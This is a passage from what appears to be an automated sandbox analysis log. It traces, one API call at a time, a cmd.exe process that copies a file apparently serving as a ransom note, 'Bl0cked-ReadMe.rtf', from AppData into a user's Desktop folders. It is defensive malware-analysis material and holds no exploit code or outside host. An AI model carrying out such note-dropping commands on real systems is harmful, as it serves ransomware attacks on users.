"c:\\windows\\system32\\gdi32.dll") Region: id = 34179 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34180 start_va = 0x4e0000 end_va = 0x5a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 34181 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34182 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34183 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34184 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 34185 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 34186 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 34187 start_va = 0x5b0000 end_va = 0x6b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 34188 start_va = 0x6c0000 end_va = 0x12bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 34189 start_va = 0x12c0000 end_va = 0x1422fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000012c0000" filename = "" Thread: id = 833 os_tid = 0xdd4 [0227.053] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fa0c | out: lpSystemTimeAsFileTime=0x26fa0c*(dwLowDateTime=0xbae6f580, dwHighDateTime=0x1d440a9)) [0227.053] GetCurrentProcessId () returned 0xfb0 [0227.053] GetCurrentThreadId () returned 0xdd4 [0227.053] GetTickCount () returned 0x3ea1f [0227.053] QueryPerformanceCounter (in: lpPerformanceCount=0x26fa04 | out: lpPerformanceCount=0x26fa04*=28384213038) returned 1 [0227.054] GetModuleHandleA (lpModuleName=0x0) returned 0x4a4d0000 [0227.054] __set_app_type (_Type=0x1) [0227.054] __p__fmode () returned 0x76b331f4 [0227.054] __p__commode () returned 0x76b331fc [0227.054] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4f21a6) returned 0x0 [0227.054] __getmainargs (in: _Argc=0x4a4f4238, _Argv=0x4a4f4240, _Env=0x4a4f423c, _DoWildCard=0, _StartInfo=0x4a4f4140 | out: _Argc=0x4a4f4238, _Argv=0x4a4f4240, _Env=0x4a4f423c) returned 0 [0227.054] GetCurrentThreadId () returned 0xdd4 [0227.054] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xdd4) returned 0x38 [0227.054] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0227.054] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0227.055] SetThreadUILanguage (LangId=0x0) returned 0x409 [0227.055] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0227.055] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f99c | out: phkResult=0x26f99c*=0x0) returned 0x2 [0227.055] VirtualQuery (in: lpAddress=0x26f9d3, lpBuffer=0x26f96c, dwLength=0x1c | out: lpBuffer=0x26f96c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0227.055] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f96c, dwLength=0x1c | out: lpBuffer=0x26f96c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0227.055] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f96c, dwLength=0x1c | out: lpBuffer=0x26f96c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0227.055] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f96c, dwLength=0x1c | out: lpBuffer=0x26f96c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0227.055] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f96c, dwLength=0x1c | out: lpBuffer=0x26f96c*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0227.055] GetConsoleOutputCP () returned 0x1b5 [0227.055] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0227.055] SetConsoleCtrlHandler (HandlerRoutine=0x4a4ee72a, Add=1) returned 1 [0227.055] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.055] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0227.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.056] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4f41ac | out: lpMode=0x4a4f41ac) returned 1 [0227.056] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.056] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0227.056] _get_osfhandle (_FileHandle=0) returned 0x3 [0227.056] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4f41b0 | out: lpMode=0x4a4f41b0) returned 1 [0227.056] _get_osfhandle (_FileHandle=0) returned 0x3 [0227.056] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0227.057] GetEnvironmentStringsW () returned 0x330198* [0227.057] FreeEnvironmentStringsW (penv=0x330198) returned 1 [0227.057] GetEnvironmentStringsW () returned 0x330198* [0227.057] FreeEnvironmentStringsW (penv=0x330198) returned 1 [0227.057] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e90c | out: phkResult=0x26e90c*=0x40) returned 0x0 [0227.057] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x0, lpData=0x26e918*=0xc0, lpcbData=0x26e910*=0x1000) returned 0x2 [0227.057] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x4, lpData=0x26e918*=0x1, lpcbData=0x26e910*=0x4) returned 0x0 [0227.057] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x0, lpData=0x26e918*=0x1, lpcbData=0x26e910*=0x1000) returned 0x2 [0227.057] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x4, lpData=0x26e918*=0x0, lpcbData=0x26e910*=0x4) returned 0x0 [0227.057] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x4, lpData=0x26e918*=0x40, lpcbData=0x26e910*=0x4) returned 0x0 [0227.057] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x4, lpData=0x26e918*=0x40, lpcbData=0x26e910*=0x4) returned 0x0 [0227.057] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x0, lpData=0x26e918*=0x40, lpcbData=0x26e910*=0x1000) returned 0x2 [0227.057] RegCloseKey (hKey=0x40) returned 0x0 [0227.058] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e90c | out: phkResult=0x26e90c*=0x40) returned 0x0 [0227.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x0, lpData=0x26e918*=0x40, lpcbData=0x26e910*=0x1000) returned 0x2 [0227.058] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x4, lpData=0x26e918*=0x1, lpcbData=0x26e910*=0x4) returned 0x0 [0227.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x0, lpData=0x26e918*=0x1, lpcbData=0x26e910*=0x1000) returned 0x2 [0227.058] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x4, lpData=0x26e918*=0x0, lpcbData=0x26e910*=0x4) returned 0x0 [0227.058] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x4, lpData=0x26e918*=0x9, lpcbData=0x26e910*=0x4) returned 0x0 [0227.058] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x4, lpData=0x26e918*=0x9, lpcbData=0x26e910*=0x4) returned 0x0 [0227.058] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e914, lpData=0x26e918, lpcbData=0x26e910*=0x1000 | out: lpType=0x26e914*=0x0, lpData=0x26e918*=0x9, lpcbData=0x26e910*=0x1000) returned 0x2 [0227.058] RegCloseKey (hKey=0x40) returned 0x0 [0227.058] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863ba [0227.058] srand (_Seed=0x5b8863ba) [0227.058] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf\"" [0227.058] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf\"" [0227.058] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4f5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.059] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3318f8, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0227.059] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0227.059] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0227.059] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0227.059] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0227.059] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0227.059] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0227.059] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0227.059] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0227.059] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0227.059] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0227.059] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0227.059] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0227.059] GetEnvironmentStringsW () returned 0x3322e8* [0227.059] FreeEnvironmentStringsW (penv=0x3322e8) returned 1 [0227.059] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.060] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a500640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0227.060] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0227.060] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0227.060] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0227.060] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0227.060] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0227.060] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0227.060] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0227.060] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0227.060] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f6d8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.060] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f6d8, lpFilePart=0x26f6d4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f6d4*="Desktop") returned 0x18 [0227.060] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0227.060] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f454 | out: lpFindFileData=0x26f454) returned 0x330028 [0227.060] FindClose (in: hFindFile=0x330028 | out: hFindFile=0x330028) returned 1 [0227.060] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f454 | out: lpFindFileData=0x26f454) returned 0x330028 [0227.061] FindClose (in: hFindFile=0x330028 | out: hFindFile=0x330028) returned 1 [0227.061] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f454 | out: lpFindFileData=0x26f454) returned 0x330028 [0227.061] FindClose (in: hFindFile=0x330028 | out: hFindFile=0x330028) returned 1 [0227.061] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0227.061] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0227.061] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0227.061] GetEnvironmentStringsW () returned 0x332b08* [0227.061] FreeEnvironmentStringsW (penv=0x332b08) returned 1 [0227.061] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4f5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.062] GetConsoleOutputCP () returned 0x1b5 [0227.062] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0227.062] GetUserDefaultLCID () returned 0x409 [0227.062] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a4f4950, cchData=8 | out: lpLCData=":") returned 2 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f818, cchData=128 | out: lpLCData="0") returned 2 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f818, cchData=128 | out: lpLCData="0") returned 2 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f818, cchData=128 | out: lpLCData="1") returned 2 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a4f4940, cchData=8 | out: lpLCData="/") returned 2 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a4f4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a4f4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a4f4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a4f4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a4f4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a4f4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a4f4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a4f4930, cchData=8 | out: lpLCData=".") returned 2 [0227.063] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a4f4920, cchData=8 | out: lpLCData=",") returned 2 [0227.063] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0227.064] GetConsoleTitleW (in: lpConsoleTitle=0x3208f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.064] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0227.064] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0227.065] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0227.065] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0227.066] _wcsicmp (_String1="type", _String2=")") returned 75 [0227.066] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0227.066] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0227.066] _wcsicmp (_String1="IF", _String2="type") returned -11 [0227.066] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0227.066] _wcsicmp (_String1="REM", _String2="type") returned -2 [0227.066] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0227.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.227] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.227] GetFileType (hFile=0x7) returned 0x2 [0227.228] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0227.228] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f710 | out: lpMode=0x26f710) returned 1 [0227.228] _dup (_FileHandle=1) returned 3 [0227.228] _close (_FileHandle=1) returned 0 [0227.235] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0227.235] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26f6e0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0227.237] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0227.237] GetConsoleTitleW (in: lpConsoleTitle=0x26f510, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0227.237] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0227.237] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0227.237] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0227.237] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0227.238] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4f5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0227.238] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x26f074, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26f074) returned 0x320e88 [0227.239] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0227.239] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0227.239] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0227.239] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26df80, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0227.239] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0227.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.239] GetFileType (hFile=0x54) returned 0x1 [0227.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.239] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x26dfd8 | out: lpFileSizeHigh=0x26dfd8*=0x0) returned 0x1632 [0227.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.239] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0227.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.239] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.240] GetFileType (hFile=0x4c) returned 0x1 [0227.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.240] GetFileType (hFile=0x4c) returned 0x1 [0227.240] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.240] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.241] GetFileType (hFile=0x4c) returned 0x1 [0227.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.241] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.241] GetFileType (hFile=0x4c) returned 0x1 [0227.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.241] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.241] GetFileType (hFile=0x4c) returned 0x1 [0227.241] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.241] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef00*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef00*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] GetFileType (hFile=0x4c) returned 0x1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] WriteFile (in: hFile=0x4c, lpBuffer=0x26ef50*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ef50*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] GetFileType (hFile=0x4c) returned 0x1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] WriteFile (in: hFile=0x4c, lpBuffer=0x26efa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26efa0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] GetFileType (hFile=0x4c) returned 0x1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] WriteFile (in: hFile=0x4c, lpBuffer=0x26eff0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eff0*, lpNumberOfBytesWritten=0x26dff4*=0x20, lpOverlapped=0x0) returned 1 [0227.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dfe0 | out: lpNewFilePointer=0x0) returned 1 [0227.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0227.242] ReadFile (in: hFile=0x54, lpBuffer=0x26ee10, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e000, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesRead=0x26e000*=0x200, lpOverlapped=0x0) returned 1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] GetFileType (hFile=0x4c) returned 0x1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] GetFileType (hFile=0x4c) returned 0x1 [0227.242] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.242] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] GetFileType (hFile=0x4c) returned 0x1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] GetFileType (hFile=0x4c) returned 0x1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26dff4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26dff4*=0x50, lpOverlapped=0x0) returned 1 [0227.243] _get_osfhandle (_FileHandle=1) returned 0x4c [0227.243] GetFileType (hFile=0x4c) returned 0x1 